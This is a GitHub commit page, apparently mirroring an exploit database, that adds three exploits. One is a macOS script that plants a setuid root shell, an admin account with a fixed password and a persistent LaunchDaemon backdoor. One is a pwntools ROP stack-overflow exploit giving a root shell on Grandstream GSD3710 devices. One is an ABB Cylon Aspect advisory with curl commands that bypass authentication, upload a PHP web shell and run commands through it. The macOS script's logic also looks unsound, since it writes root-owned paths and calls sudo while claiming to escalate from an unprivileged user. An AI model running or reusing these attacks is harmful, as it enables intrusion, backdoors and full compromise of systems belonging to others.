Skip to content

Commit df3766c

Browse files
author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents f6e8a42 + 2825165 commit df3766c

File tree

7 files changed

+586
-0
lines changed

7 files changed

+586
-0
lines changed

exploits/macos/local/52316.py

Lines changed: 100 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,100 @@
1+
#!/usr/bin/env python3
2+
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
3+
# Author: Mohammed Idrees Banyamer (@banyamer_security)
4+
# GitHub: https://github.com/mbanyamer
5+
# Date: 2025-05-31
6+
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
7+
# CVE: CVE-2025-24085
8+
# Type: Local Privilege Escalation
9+
# Platform: macOS
10+
# Author Country: Jordan
11+
# Description:
12+
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
13+
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
14+
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
15+
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
16+
# on macOS Sonoma systems.
17+
18+
import os
19+
import plistlib
20+
import time
21+
from pathlib import Path
22+
23+
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
24+
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
25+
26+
def create_payload():
27+
print("[+] Creating root payload script...")
28+
payload = """#!/bin/bash
29+
# Root shell
30+
cp /bin/bash /tmp/.rootbash
31+
chmod +s /tmp/.rootbash
32+
chown root:wheel /tmp/.rootbash
33+
34+
# Add admin user
35+
sysadminctl -addUser pentest -password macOS123! -admin
36+
37+
# Log file
38+
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
39+
40+
# Persistent backdoor
41+
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
42+
<?xml version="1.0" encoding="UTF-8"?>
43+
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
44+
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
45+
<plist version="1.0">
46+
<dict>
47+
<key>Label</key><string>com.apple.backdoor</string>
48+
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
49+
<key>RunAtLoad</key><true/>
50+
</dict>
51+
</plist>
52+
EOF
53+
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
54+
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
55+
"""
56+
with open(PAYLOAD_SCRIPT, "w") as f:
57+
f.write(payload)
58+
os.chmod(PAYLOAD_SCRIPT, 0o755)
59+
60+
def hijack_launchdaemon():
61+
print("[+] Hijacking LaunchDaemon plist...")
62+
if not Path(LAUNCHD_PLIST).exists():
63+
# create a fake one
64+
print("[*] Creating fake LaunchDaemon plist for exploitation...")
65+
plist_data = {
66+
'Label': 'com.apple.securemonitor',
67+
'ProgramArguments': [PAYLOAD_SCRIPT],
68+
'RunAtLoad': True,
69+
}
70+
with open(LAUNCHD_PLIST, "wb") as f:
71+
plistlib.dump(plist_data, f)
72+
else:
73+
# hijack existing one
74+
with open(LAUNCHD_PLIST, 'rb') as f:
75+
plist = plistlib.load(f)
76+
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
77+
plist['RunAtLoad'] = True
78+
with open(LAUNCHD_PLIST, 'wb') as f:
79+
plistlib.dump(plist, f)
80+
81+
os.system(f"chmod 644 {LAUNCHD_PLIST}")
82+
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
83+
84+
def trigger_payload():
85+
print("[+] Triggering LaunchDaemon manually...")
86+
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
87+
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
88+
89+
def main():
90+
if os.geteuid() == 0:
91+
print("[!] You are already root. No need to exploit.")
92+
return
93+
create_payload()
94+
hijack_launchdaemon()
95+
print("[+] Exploit completed. Reboot or run manually:")
96+
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
97+
print(" Then run: /tmp/.rootbash -p")
98+
99+
if __name__ == "__main__":
100+
main()

exploits/multiple/remote/52313.py

Lines changed: 110 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,110 @@
1+
#!/usr/bin/env python3
2+
3+
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
4+
# Date: 2025-05-29
5+
# Exploit Author: Pepelux
6+
# Vendor Homepage: https://www.grandstream.com/
7+
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
8+
# Tested on: Linux and MacOS
9+
# CVE: CVE-2022-2025
10+
11+
"""
12+
Author: Jose Luis Verdeguer (@pepeluxx)
13+
14+
Required: Pwntools
15+
16+
Example:
17+
18+
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
19+
"""
20+
21+
22+
from struct import pack
23+
import sys
24+
from time import sleep
25+
import argparse
26+
from pwn import *
27+
28+
29+
def get_args():
30+
parser = argparse.ArgumentParser(
31+
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
32+
prog, max_help_position=50))
33+
34+
# Add arguments
35+
parser.add_argument('-i', '--ip', type=str, required=True,
36+
help='device IP address', dest="ip")
37+
parser.add_argument('-u', '--user', type=str, required=True,
38+
help='username', dest="user")
39+
parser.add_argument('-p', '--pass', type=str, required=True,
40+
help='password', dest="pwd")
41+
42+
# Array for all arguments passed to script
43+
args = parser.parse_args()
44+
45+
try:
46+
ip = args.ip
47+
user = args.user
48+
pwd = args.pwd
49+
50+
return ip, user, pwd
51+
except ValueError:
52+
exit()
53+
54+
def check_badchars(payload):
55+
for i in range(5, len(payload)):
56+
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
57+
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
58+
return True
59+
return False
60+
61+
62+
def main():
63+
ip, user, pwd = get_args()
64+
65+
libc_base = 0x76bb8000
66+
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
67+
bin_sh = libc_base + 0xCEA9C # /bin/sh
68+
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
69+
exit = libc_base + 0x2660C
70+
71+
print("[*] Libc base: %#x" % libc_base)
72+
print("[*] ROP gadget: %#x" % gadget)
73+
print("[*] /bin/sh: %#x" % bin_sh)
74+
print("[*] system: %#x" % system)
75+
print("[*] exit: %#x\n" % exit)
76+
77+
padding = b"A" * 320
78+
79+
payload = b'ping '
80+
payload += padding
81+
payload += p32(gadget)
82+
payload += p32(bin_sh)
83+
payload += b"AAAA"
84+
payload += p32(system)
85+
payload += p32(exit)
86+
87+
if check_badchars(payload):
88+
sys.exit(0)
89+
90+
count = 1
91+
92+
while True:
93+
print('Try: %d' % count)
94+
s = ssh(user, ip, 22, pwd)
95+
p = s.shell(tty=False)
96+
print(p.readuntil(b"GDS3710> "))
97+
p.sendline(payload)
98+
p.sendline(b"id")
99+
sleep(1)
100+
data = p.read()
101+
if str(data).find('root') > -1:
102+
print('PWNED!')
103+
p.interactive()
104+
s.close()
105+
sys.exit()
106+
s.close()
107+
count += 1
108+
109+
if __name__ == '__main__':
110+
main()

exploits/multiple/remote/52317.txt

Lines changed: 97 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,97 @@
1+
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
2+
3+
4+
Vendor: ABB Ltd.
5+
Product web page: https://www.global.abb
6+
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
7+
Firmware: <=3.08.04
8+
9+
Summary: ASPECT is an award-winning scalable building energy management
10+
and control solution designed to allow users seamless access to their
11+
building data through standard building protocols including smart devices.
12+
13+
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
14+
AuthenticatedHttpServlet within its application server, enabling
15+
remote attackers to bypass authentication by setting the Host:
16+
127.0.0.1 header. This deceives the server into processing requests
17+
as if they originate from localhost, granting unauthorized access
18+
to privileged operations. This bypass grants access to privileged
19+
functionality, including the DeploymentServlet, which is vulnerable
20+
to directory traversal. By leveraging this, an attacker can write
21+
arbitrary PHP files outside the intended directory scope. When combined,
22+
these issues allow remote attackers to upload a malicious PHP shell
23+
and execute system commands with the privileges of the web server,
24+
leading to full system compromise.
25+
26+
Tested on: GNU/Linux 3.15.10 (armv7l)
27+
GNU/Linux 3.10.0 (x86_64)
28+
GNU/Linux 2.6.32 (x86_64)
29+
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
30+
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
31+
PHP/7.3.11
32+
PHP/5.6.30
33+
PHP/5.4.16
34+
PHP/4.4.8
35+
PHP/5.3.3
36+
AspectFT Automation Application Server
37+
lighttpd/1.4.32
38+
lighttpd/1.4.18
39+
Apache/2.2.15 (CentOS)
40+
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
41+
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
42+
ErgoTech MIX Deployment Server 2.0.0
43+
44+
45+
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
46+
@zeroscience
47+
48+
49+
Advisory ID: ZSL-2025-5954
50+
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
51+
52+
53+
21.04.2024
54+
55+
--
56+
57+
58+
$ cat project
59+
60+
P R O J E C T
61+
62+
.|
63+
| |
64+
|'| ._____
65+
___ | | |. |' .---"|
66+
_ .-' '-. | | .--'| || | _| |
67+
.-'| _.| | || '-__ | | | || |
68+
|' | |. | || | | | | || |
69+
____| '-' ' "" '-' '-.' '` |____
70+
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
71+
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
72+
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
73+
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
74+
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
75+
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
76+
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
77+
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
78+
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
79+
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
80+
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
81+
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
82+
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
83+
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
84+
85+
86+
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
87+
> ?RequestType=DeploySource\
88+
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
89+
> &directory=/" \
90+
> --data-binary @zsl.php \
91+
> -H "Host: 127.0.0.1" \
92+
> -H "Content-Type: application/octet-stream"
93+
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
94+
95+
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
96+
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
97+
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php

0 commit comments

Comments
 (0)